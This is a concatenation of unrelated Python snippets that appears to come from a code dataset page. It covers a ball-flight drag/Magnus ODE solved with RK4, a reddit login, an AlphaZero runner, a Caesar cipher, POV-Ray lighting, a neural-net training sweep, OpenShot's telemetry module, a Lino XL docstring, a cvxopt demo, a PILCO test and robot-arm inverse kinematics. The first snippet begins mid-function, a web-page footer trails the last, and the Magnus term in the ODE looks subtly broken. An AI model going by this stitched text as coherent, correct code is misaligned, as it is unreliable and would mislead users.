    """Right-hand side of the ball-flight ODE; returns the 4-vector of
    derivatives of [pos_x, vel_x, pos_z, vel_z] with drag (C_D) and optional
    Magnus lift (C_M, gated by eta)."""
    deriv = np.zeros(4)
    speed = math.sqrt((y[1]**2)+(y[3]**2))
    # Empirical drag and Magnus coefficients as functions of speed/spin ratio
    C_D = 0.508 + (1/(22.064 + 4.196*(speed/omega)**(5/2)))**(2/5)
    C_M = (1 / (2.022 + 0.981*(speed/omega)))
    deriv[0] = y[1]
    deriv[1] = (-C_D*alpha*speed*y[1]) + (eta*C_M*alpha*speed*(y[3]**2)*y[3])
    deriv[2] = y[3]
    deriv[3] = (-g)-(C_D*alpha*speed*y[3]) - (eta*C_M*alpha*speed*y[1])
    return deriv
# Integrate the trajectory with RK4 and plot height (Y[:,2]) vs range (Y[:,0])
solver = RK4(F)
solver.set_Inital_Conditions(y)
X, Y = solver.solve(x,xStop,h)
print(Y[:,0])
# np.savetxt("notopspinX.csv",X,delimiter=',')
# np.savetxt("notopspinY.csv",Y,delimiter=',')
plt.plot(Y[:,0], Y[:,2])
plt.show()
from reddit import client
from reddit.user import User
from reddit.reddits import Subreddit
# Log in as user 'Donzuh' and fetch the authenticated user's own profile
Donzuh = client.login('Donzuh')
Donzuh.me()
# python = Subreddit("python")
#
# python.hot()
|
# coding: utf-8
import sys
sys.path.append('..')
sys.path.append('../src')
import learner
import config
if __name__ == "__main__":
    # Require a mode argument: "train" or "play"
    if len(sys.argv) < 2 or sys.argv[1] not in ["train", "play"]:
        print("[USAGE] python leaner_test.py train|play")
        exit(1)
    # NOTE: "Leaner" is the (misspelled) class name exported by the learner module
    alpha_zero = learner.Leaner(config.config)
    if sys.argv[1] == "train":
        alpha_zero.learn()
    elif sys.argv[1] == "play":
        # Play ten games against a human, alternating who moves first
        for i in range(10):
            print("GAME: {}".format(i + 1))
            alpha_zero.play_with_human(human_first=i % 2)
|
import string

# Read the shift amount for the substitution alphabet
step = int(input("Please enter step for Cesar code: "))

# Rotate the lowercase alphabet left by `step` and pair it with the original
plain = list(string.ascii_lowercase)
rotated = plain[step:] + plain[:step]
cesar = dict(zip(plain, rotated))
print("Cesar code with step %i is:" % step, cesar)
from typing import TextIO
def setup_lights(writer: TextIO):
    """Place the scene's three lights, evenly spaced along the z axis."""
    for z in (0.8, 1.5, 2.2):
        _place_light(writer, 1.3, 2.4, z)
def _place_light(writer: TextIO, x, y, z):
    """Write one POV-Ray light_source block at (x, y, z) to *writer*."""
    writer.write(f"""
light_source {{
<{x},{y},{z}>
color Gray50
}}
// looks_like {{ Lightbulb }}
""")
|
# -------------------------------------------------------------------------------------
# Calls contour data set training script with different gaussian regularization
# loss weights.
# -------------------------------------------------------------------------------------
import numpy as np
import torch
from train_contour_data_set import main
import models.new_piech_models as new_piech_models
if __name__ == '__main__':
    random_seed = 10

    # Make runs reproducible across torch and numpy
    torch.manual_seed(random_seed)
    np.random.seed(random_seed)

    # Gaussian regularization loss weights to sweep (log-spaced)
    gaussian_reg_weight_arr = [0.1, 0.01, 0.001, 0.0001, 0.00001, 0.000001]

    # ----------------------------------------------------------------------
    data_set_parameters = {
        'data_set_dir': "./data/channel_wise_optimal_full14_frag7",
        'train_subset_size': 20000,
        'test_subset_size': 2000
    }

    for loss_weight in gaussian_reg_weight_arr:
        print("Processing gaussian regularization with width = {} {}".format(loss_weight, '*' * 40))

        train_parameters = {
            'random_seed': random_seed,
            'train_batch_size': 32,
            'test_batch_size': 32,
            'learning_rate': 1e-4,
            'num_epochs': 100,
            'lateral_w_reg_weight': loss_weight,
            'lateral_w_reg_gaussian_sigma': 10,
            'clip_negative_lateral_weights': True,
            'lr_sched_step_size': 80,
            'lr_sched_gamma': 0.5
        }

        # Results for each weight go into their own subdirectory
        base_results_dir = './results/gaussian_reg_loss_weight_explore/weight_{}'.format(loss_weight)

        # Build a fresh model for every sweep point
        cont_int_layer = new_piech_models.CurrentSubtractInhibitLayer(
            lateral_e_size=15, lateral_i_size=15, n_iters=5, use_recurrent_batch_norm=True)
        model = new_piech_models.ContourIntegrationResnet50(cont_int_layer)

        main(
            model,
            data_set_params=data_set_parameters,
            train_params=train_parameters,
            base_results_store_dir=base_results_dir
        )
    # ----------------------------------------------------------------------
    # Bug fix: removed a leftover debugging breakpoint
    # (`import pdb; pdb.set_trace()`) that halted the script after the sweep.
|
"""
@file
@brief This file sends anonymous application metrics and errors over HTTP
@author Jonathan Thomas <jonathan@openshot.org>
@section LICENSE
Copyright (c) 2008-2018 OpenShot Studios, LLC
(http://www.openshotstudios.com). This file is part of
OpenShot Video Editor (http://www.openshot.org), an open-source project
dedicated to delivering high quality video editing and animation solutions
to the world.
OpenShot Video Editor is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OpenShot Video Editor is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with OpenShot Library. If not, see <http://www.gnu.org/licenses/>.
"""
# idna encoding import required to prevent bug (unknown encoding: idna)
import encodings.idna
import requests
import platform
import threading
import urllib.parse
from copy import deepcopy
from classes import info
from classes import language
from classes.logger import log
from classes import settings
import openshot
from PyQt5.QtCore import QT_VERSION_STR
from PyQt5.QtCore import PYQT_VERSION_STR
# Get settings
s = settings.get_settings()

# Determine OS version (default: assume Linux/X11; refined below)
os_version = "X11; Linux %s" % platform.machine()
linux_distro = "None"
try:
    if platform.system() == "Darwin":
        v = platform.mac_ver()
        os_version = "Macintosh; Intel Mac OS X %s" % v[0].replace(".", "_")
        linux_distro = "OS X %s" % v[0]
    elif platform.system() == "Windows":
        v = platform.win32_ver()
        # TODO: Upgrade windows python (on build server) version to 3.5, so it correctly identifies Windows 10
        os_version = "Windows NT %s; %s" % (v[0], v[1])
        linux_distro = "Windows %s" % "-".join(platform.win32_ver())
    elif platform.system() == "Linux":
        # Get the distro name and version (if any)
        linux_distro = "-".join(platform.linux_distribution())
except Exception as Ex:
    log.error("Error determining OS version in metrics.py")

# Build user-agent
user_agent = "Mozilla/5.0 (%s) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" % os_version

# Base Google-Analytics payload shared (via deepcopy) by every metric request
params = {
    "cid": s.get("unique_install_id"),  # Unique install ID
    "v": 1,  # Google Measurement API version
    "tid": "UA-4381101-5",  # Google Analytic Tracking ID
    "an": info.PRODUCT_NAME,  # App Name
    "aip": 1,  # Anonymize IP
    "aid": "org.openshot.%s" % info.NAME,  # App ID
    "av": info.VERSION,  # App Version
    "ul": language.get_current_locale().replace('_', '-').lower(),  # Current Locale
    "ua": user_agent,  # Custom User Agent (for OS, Processor, and OS version)
    "cd1": "1.0.0",  #openshot.OPENSHOT_VERSION_FULL, # Dimension 1: libopenshot version
    "cd2": platform.python_version(),  # Dimension 2: python version (i.e. 3.4.3)
    "cd3": QT_VERSION_STR,  # Dimension 3: qt5 version (i.e. 5.2.1)
    "cd4": PYQT_VERSION_STR,  # Dimension 4: pyqt5 version (i.e. 5.2.1)
    "cd5": linux_distro  # Dimension 5: OS/distro description string
}
def track_metric_screen(screen_name):
    """Report a GUI screen view in a background thread (fire-and-forget)."""
    payload = deepcopy(params)
    payload.update({
        "t": "screenview",
        "cd": screen_name,
        "cid": s.get("unique_install_id"),
    })
    threading.Thread(target=send_metric, args=[payload]).start()
def track_metric_event(event_action, event_label, event_category="General", event_value=0):
    """Report a UI event (category/action/label/value) in a background thread."""
    payload = deepcopy(params)
    payload.update({
        "t": "event",
        "ec": event_category,
        "ea": event_action,
        "el": event_label,
        "ev": event_value,
        "cid": s.get("unique_install_id"),
    })
    threading.Thread(target=send_metric, args=[payload]).start()
def track_metric_error(error_name, is_fatal=False):
    """Report that an error occurred; `is_fatal` sets the exception-fatal flag."""
    payload = deepcopy(params)
    payload["t"] = "exception"
    payload["exd"] = error_name
    payload["exf"] = 1 if is_fatal else 0
    threading.Thread(target=send_metric, args=[payload]).start()
def track_exception_stacktrace(stacktrace, source):
    """Report an exception stacktrace in a background thread."""
    threading.Thread(target=send_exception, args=[stacktrace, source]).start()
def track_metric_session(is_start=True):
    """Report a session boundary: app launch (default) or app close."""
    payload = deepcopy(params)
    payload["t"] = "screenview"
    payload["cid"] = s.get("unique_install_id")
    if is_start:
        payload["sc"], payload["cd"] = "start", "launch-app"
    else:
        payload["sc"], payload["cd"] = "end", "close-app"
    threading.Thread(target=send_metric, args=[payload]).start()
def send_metric(params):
    """Send one anonymous metric payload to Google Analytics over HTTP."""
    # Respect the user's opt-out preference
    if not s.get("send_metrics"):
        return
    url = "http://www.google-analytics.com/collect?%s" % urllib.parse.urlencode(params)
    try:
        # NOTE(review): verify=False disables TLS certificate checks -- confirm intentional
        r = requests.get(url, headers={"user-agent": user_agent}, verify=False)
        log.info("Track metric: [%s] %s | (%s bytes)" % (r.status_code, r.url, len(r.content)))
    except Exception as Ex:
        log.error("Failed to Track metric: %s" % (Ex))
def send_exception(stacktrace, source):
    """Send an exception stacktrace to the openshot.org collector over HTTP."""
    # Respect the user's opt-out preference
    if not s.get("send_metrics"):
        return
    data = urllib.parse.urlencode({"stacktrace": stacktrace,
                                   "platform": platform.system(),
                                   "version": info.VERSION,
                                   "source": source,
                                   "unique_install_id": s.get("unique_install_id")})
    url = "http://www.openshot.org/exception/json/"
    try:
        # NOTE(review): verify=False disables TLS certificate checks -- confirm intentional
        r = requests.post(url, data=data, headers={"user-agent": user_agent, "content-type": "application/x-www-form-urlencoded"}, verify=False)
        log.info("Track exception: [%s] %s | %s" % (r.status_code, r.url, r.text))
    except Exception as Ex:
        log.error("Failed to Track exception: %s" % (Ex))
|
# Copyright 2008-2018 Rumma & Ko Ltd
# License: GNU Affero General Public License v3 (see file COPYING for details)
"""These are the plugins included with Lino XL.
Contacts management
===================
.. autosummary::
:toctree:
countries
contacts
addresses
phones
households
humanlinks
cv
dupable_partners
Groupware
=========
.. autosummary::
:toctree:
boards
teams
lists
groups
topics
deploy
tickets
skills
working
votes
Calendar functionalities
========================
.. autosummary::
:toctree:
cal
calview
extensible
reception
rooms
courses
Office functionalities
======================
.. autosummary::
:toctree:
notes
outbox
postings
mailbox
caldav
ERP
===
.. autosummary::
:toctree:
products
orders
shopping
System extensions
=================
.. autosummary::
:toctree:
appypod
excerpts
stars
userstats
Miscellaneous
=============
.. autosummary::
:toctree:
beid
polls
clients
coachings
trends
Content management
==================
.. autosummary::
:toctree:
blogs
pages
Accounting stuff
================
.. autosummary::
:toctree:
b2c
ledger
sales
finan
tim2lino
sepa
invoicing
vat
vatless
bevat
bevats
eevat
ana
sheets
Plugin namespaces
=======================
(See :ref:`plugin_namespaces`).
.. autosummary::
:toctree:
statbel
online
Experimental and not much used
==============================
.. autosummary::
:toctree:
concepts
eid_jslib
thirds
events
families
properties
inspect
"""
|
from cvxopt import blas, lapack, solvers
from cvxopt import matrix, spdiag, mul, div, sparse
from cvxopt import spmatrix, sqrt, base
import numpy as np
"""
2x + y + 3z = 1
2x + 6y + 8z = 3
6x + 8y + 18z = 5
Solution:
(x, y, z) = ( 3/10, 2/5, 0)
CVXOPT cvxopt.lapack.gesv(A, B[, ipiv = None]) Solves
A X = B,
where A and B are real or complex matrices, with A square and nonsingular.
On entry, B contains the right-hand side B; on exit it contains the solution X.
To run:
python pyalad/test_linear_solver.py
"""
# Demo: solve the 3x3 system described in the module docstring via LAPACK gesv.
tA = np.array([[2, 1, 3],
               [2, 6, 8],
               [6, 8, 18]], dtype=float)
tb = np.array([1, 3, 5], dtype=float)
# Fixed: Python-2-only `print x` statements replaced with the parenthesized
# call form, which behaves identically on Python 2 and is valid on Python 3.
print(tA)
print(tb)
A = matrix(tA)
b = matrix(tb)
print(A)
print(b)
# gesv overwrites its second argument with the solution, so solve on a copy of b
x = matrix(b)
print(x)
lapack.gesv(A, x)
print(A * x)           # should reproduce b
print((3./10, 2./5, 0))  # expected solution for reference
|
import os

# Work relative to this script's own directory. abspath() guards against a
# bare-filename __file__, whose dirname is "" and would make chdir() raise.
os.chdir(os.path.dirname(os.path.abspath(__file__)))

# Create the data directories. makedirs(exist_ok=True) replaces the original
# check-then-mkdir list comprehension (race-prone, and a comprehension used
# purely for side effects).
for folder in ("data", "data/requirements_xml"):
    os.makedirs(folder, exist_ok=True)
|
from pilco.models import SMGPR
import numpy as np
import os
import oct2py
# Start an embedded Octave session and put the reference MATLAB code on its path
octave = oct2py.Oct2Py()
# NOTE(review): realpath("__file__") resolves the literal string "__file__"
# (i.e. the current working directory), not this module's path -- likely
# meant realpath(__file__); confirm before relying on it elsewhere.
dir_path = os.path.dirname(os.path.realpath("__file__")) + "/tests/Matlab Code"
octave.addpath(dir_path)

from gpflow import config
float_type = config.default_float()  # dtype gpflow computes in (e.g. float64)
def test_sparse_predictions():
    """Check SMGPR moment-matching predictions against the reference MATLAB
    implementation (gp1.m) executed through Octave."""
    np.random.seed(0)
    d = 3  # Input dimension
    k = 2  # Number of outputs

    # Training Dataset
    X0 = np.random.rand(100, d)
    A = np.random.rand(d, k)
    Y0 = np.sin(X0).dot(A) + 1e-3*(np.random.rand(100, k) - 0.5)  # Just something smooth

    smgpr = SMGPR((X0, Y0), num_induced_points=30)
    smgpr.optimize()

    # Generate input
    m = np.random.rand(1, d)  # But MATLAB defines it as m'
    s = np.random.rand(d, d)
    s = s.dot(s.T)  # Make s positive semidefinite

    M, S, V = smgpr.predict_on_noisy_inputs(m, s)

    # convert data to the struct expected by the MATLAB implementation:
    # log-hyperparameters stacked as [lengthscales; signal std; noise std]
    lengthscales = np.stack([model.kernel.lengthscales for model in smgpr.models])
    variance = np.stack([model.kernel.variance for model in smgpr.models])
    noise = np.stack([model.likelihood.variance for model in smgpr.models])
    hyp = np.log(np.hstack(
        (lengthscales,
         np.sqrt(variance[:, None]),
         np.sqrt(noise[:, None]))
    )).T

    gpmodel = oct2py.io.Struct()
    gpmodel.hyp = hyp
    gpmodel.inputs = X0
    gpmodel.targets = Y0
    gpmodel.induce = smgpr.Z.numpy()

    # Call function in octave
    M_mat, S_mat, V_mat = octave.gp1(gpmodel, m.T, s, nout=3)

    # Shapes first, then values (MATLAB returns the mean transposed)
    assert M.shape == M_mat.T.shape
    assert S.shape == S_mat.shape
    assert V.shape == V_mat.shape
    np.testing.assert_allclose(M, M_mat.T, rtol=1e-4)
    np.testing.assert_allclose(S, S_mat, rtol=1e-4)
    np.testing.assert_allclose(V, V_mat, rtol=1e-4)

if __name__ == '__main__':
    test_sparse_predictions()
|
#!/usr/bin/env python
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
mm |<----84---->|
|<---60--->| |
|____ | |
J3 /o____|=o=o=__+__ _____
/ / )d | | | lenPump 78
/ / _|o|_ ___|_
/ / (x,y,z)
/ /
/ / J2 to J3 250, smallArm
/ /
/ /
/ /
/o/ )c <-------J2------———————
| | | J1 to J2 218 big arm
| | |
| | |
| | |
| | |
_________| | |
| o| )b <-------J1------———————
J0 |o )a | | J1 to base 10
(((((((((|o|)))))))))))))) |
|o| |
(((((((((|o|)))))))))))))) _......Base.....______|_
| |
|<--102-->| J0 to J1
a,b,c,d: jointAngle
(x,y,z): endpoint postion
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
from math import acos, isnan, pi, atan2, sqrt, sin, cos

MATH_TRANS = 180/pi     # radians -> degrees conversion factor
MATH_LOWER_ARM = 218    # J1-J2 link length (mm) -- "big arm" in the sketch above
MATH_UPPER_ARM = 250    # J2-J3 link length (mm) -- "small arm"


class robot_arm_ik():
    """Inverse kinematics for the 3-joint arm sketched in the header above."""

    def postion_to_angle(self, postion, angle):  # postion (mm), angle (degree)
        """Fill *angle* (list of 3) with joint angles in degrees for the
        cartesian target *postion*; return True on success, False when the
        target is unreachable."""
        x = postion[0]
        y = postion[1]
        z = postion[2]

        # Base joint: rotation in the horizontal plane
        if y == 0:
            base_deg = 0
        elif y < 0:
            base_deg = - atan2(x,y)*MATH_TRANS
        else:
            base_deg = atan2(x,y)*MATH_TRANS

        # Offsets from the base frame to the shoulder joint (mm)
        r_offset = 100 + 95
        z_offset = 100 - 70
        reach = sqrt(x**2 + y**2) - r_offset   # planar distance from shoulder
        height = z - z_offset                  # height above shoulder
        if reach < 0:
            print("r={:}, s={:}".format(reach,height))
            return False
        if sqrt(height ** 2 + reach ** 2) > (MATH_LOWER_ARM + MATH_UPPER_ARM):
            print("too far to move")
            return False

        # Two-link planar IK via the law of cosines
        D = (height ** 2 + reach ** 2 - MATH_LOWER_ARM ** 2 - MATH_UPPER_ARM ** 2) / (2 * MATH_LOWER_ARM * MATH_UPPER_ARM)
        elbow = acos(D)
        shoulder = atan2(height,reach) + atan2(MATH_UPPER_ARM*sin(elbow),MATH_LOWER_ARM + MATH_UPPER_ARM*cos(elbow))

        angle[0] = base_deg
        angle[1] = shoulder*MATH_TRANS
        angle[2] = elbow*MATH_TRANS
        return True

    def armAngle_to_motorAngle(self, angle):
        """Map arm angles to motor angles; motor 3 is driven relative to motor 2."""
        return (angle[0], angle[1], angle[1] - angle[2])
if __name__=="__main__":
    # Smoke test: run the IK for a sample point and print the joint angles.
    try:
        ik = robot_arm_ik()
        postion=[426.35,146.80,253.52]
        angle=[0,0,0]
        motor=[0,0,0]
        # Bug fix: the class exposes postion_to_angle(), not robot_arm_ik();
        # the old call raised AttributeError (silently printed by the except).
        ik.postion_to_angle(postion, angle)
        print("angle={:.2f},{:.2f}, {:.2f}".format(angle[0], angle[1], angle[2]))
    except Exception as e:
        print(e)
    finally:
        print("quit")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.